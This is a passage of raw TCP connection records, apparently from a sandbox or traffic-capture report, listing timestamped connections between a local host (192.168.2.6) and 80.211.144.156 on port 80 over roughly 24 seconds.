                                                            Sep 2, 2024 13:34:41.938983917 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.247843027 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.252873898 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.319852114 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.324736118 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.324789047 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.562072992 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.582245111 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.618484974 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.694101095 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.769830942 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.800107956 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.848208904 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.848453045 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.849780083 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.853441954 CEST804981080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.853494883 CEST4981080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.853794098 CEST804981180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.853832960 CEST4981180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.854757071 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:42.854818106 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.855070114 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:42.859950066 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.212337971 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.217206001 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.511909962 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.588321924 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.727143049 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.792279005 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.863555908 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.864727020 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.868715048 CEST804981280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.868805885 CEST4981280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.870003939 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:43.870091915 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.870357990 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:43.875257969 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.228072882 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.232899904 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639075041 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639733076 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.639842033 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.773196936 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.774651051 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.778419018 CEST804981380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.778476954 CEST4981380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.779483080 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:44.779553890 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.779737949 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:44.784527063 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.134491920 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.139425993 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.424245119 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.549455881 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.549552917 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.708291054 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.710125923 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.713881969 CEST804981480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.713962078 CEST4981480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.714920044 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:45.715008020 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.715205908 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:45.720889091 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.071882010 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.076812029 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.379530907 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.508801937 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.508872986 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.635087013 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.636586905 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.640438080 CEST804981580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.640495062 CEST4981580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.641531944 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.641593933 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.641783953 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:46.646528006 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:46.993664980 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.001766920 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.307096004 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.415374041 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.441076040 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.524734974 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.569423914 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.570786953 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.574732065 CEST804981680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.574806929 CEST4981680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.575647116 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.575722933 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.575963974 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.580749989 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.808063030 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.812928915 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.813020945 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.813683033 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.818473101 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:47.934787035 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:47.939682007 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.167489052 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.172384977 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.172496080 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.229660034 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.274790049 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.353131056 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.471065044 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.493185043 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.498311043 CEST804981780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.498476982 CEST4981780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.500179052 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.505012035 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.505088091 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.505717993 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.510629892 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.524761915 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.601803064 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:48.727878094 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.853290081 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:48.858114004 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.180048943 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.290380955 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.305191994 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.435327053 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.435630083 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.436465979 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.647269964 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.647344112 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.649049997 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.649070024 CEST804981880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.649132013 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.649149895 CEST4981880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.649369001 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.649604082 CEST804981980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.649682999 CEST4981980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.655143023 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:49.993706942 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:49.999536991 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.305536985 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.384156942 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.434478045 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.500793934 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.576543093 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.577403069 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.582892895 CEST804982080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.582953930 CEST4982080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.583024979 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.583093882 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.583271027 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.589512110 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:50.937712908 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:50.943604946 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:51.256860018 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:51.381167889 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:51.382280111 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.230420113 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.232170105 CEST4982280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.238905907 CEST804982180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:52.238986015 CEST4982180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.239690065 CEST804982280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:52.239767075 CEST4982280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.240063906 CEST4982280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.245260954 CEST804982280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:52.587743044 CEST4982280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:52.592889071 CEST804982280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:52.896509886 CEST804982280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.034858942 CEST804982280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.034918070 CEST4982280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.165581942 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.170435905 CEST804982380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.170557022 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.170660973 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.176260948 CEST804982380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.525063992 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.529911041 CEST804982380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.605812073 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.606667995 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.610716105 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.610775948 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.610939980 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.616800070 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.633533001 CEST804982380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.634251118 CEST4982380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.756927967 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.761920929 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:53.762001991 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.762196064 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:53.767266989 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.121349096 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.126317978 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.126503944 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.198261023 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.203315020 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.257817984 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.437721968 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.477874994 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.478786945 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.478847027 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.485785961 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.524746895 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.583578110 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.643871069 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.727932930 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.903429031 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.903740883 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.904570103 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.909099102 CEST804982480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.909162045 CEST4982480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.909414053 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.909499884 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.909677029 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.910074949 CEST804982580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:54.910154104 CEST4982580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:54.914567947 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.259227037 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.264105082 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.562895060 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.704981089 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.705044985 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.849297047 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.850075960 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.854451895 CEST804982680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.854515076 CEST4982680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.854981899 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:55.855048895 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.855164051 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:55.859972954 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.212521076 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.217479944 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.519773960 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.618503094 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.648953915 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.727864027 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.780841112 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.781728983 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.785960913 CEST804982780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.786005974 CEST4982780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.786550999 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:56.786660910 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.786775112 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:56.791729927 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.137279034 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.142261028 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.438268900 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.557244062 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.557399988 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.680433989 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.681690931 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.685591936 CEST804982880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.685686111 CEST4982880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.686826944 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:57.686901093 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.687086105 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:57.692667007 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.040652990 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.046178102 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.344638109 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.384140968 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.558609009 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.681010008 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.687975883 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.690704107 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.693309069 CEST804982980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.693394899 CEST4982980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.695636988 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:58.695694923 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.695794106 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:58.700917959 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.096906900 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.102185011 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.377006054 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.507061005 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.509880066 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.732682943 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.737561941 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.738496065 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.743561029 CEST804983080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.743665934 CEST4983080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.835563898 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.840416908 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:59.840503931 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.840683937 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:59.845454931 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.196726084 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.201910973 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.487973928 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.587266922 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.614816904 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.744749069 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.746637106 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.750031948 CEST804983180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.750174999 CEST4983180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.754659891 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:00.754756927 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.755006075 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:00.761123896 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:01.103287935 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:01.108124018 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:01.401489019 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:01.477909088 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:01.684755087 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:01.684947014 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:01.685024023 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.061917067 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.063524008 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.067295074 CEST804983280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.067433119 CEST4983280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.068371058 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.068455935 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.068628073 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.074095011 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.415637970 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.420708895 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.720129967 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.841665030 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.841737986 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.958323002 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.959815979 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.963496923 CEST804983380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.963570118 CEST4983380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.964582920 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:03.964724064 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.964816093 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:03.969660997 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:04.321918011 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:04.326888084 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:04.637662888 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:04.764992952 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:04.765058994 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:04.876893997 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:04.877706051 CEST4983580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.041055918 CEST804983580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.041073084 CEST804983480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.041219950 CEST4983480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.044523001 CEST4983580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.275333881 CEST4983580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.583420038 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.583549976 CEST4983580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.584867954 CEST804983580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.588238955 CEST804983680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.588299990 CEST4983680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:05.588583946 CEST804983580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:05.588644028 CEST4983580192.168.2.680.211.144.156
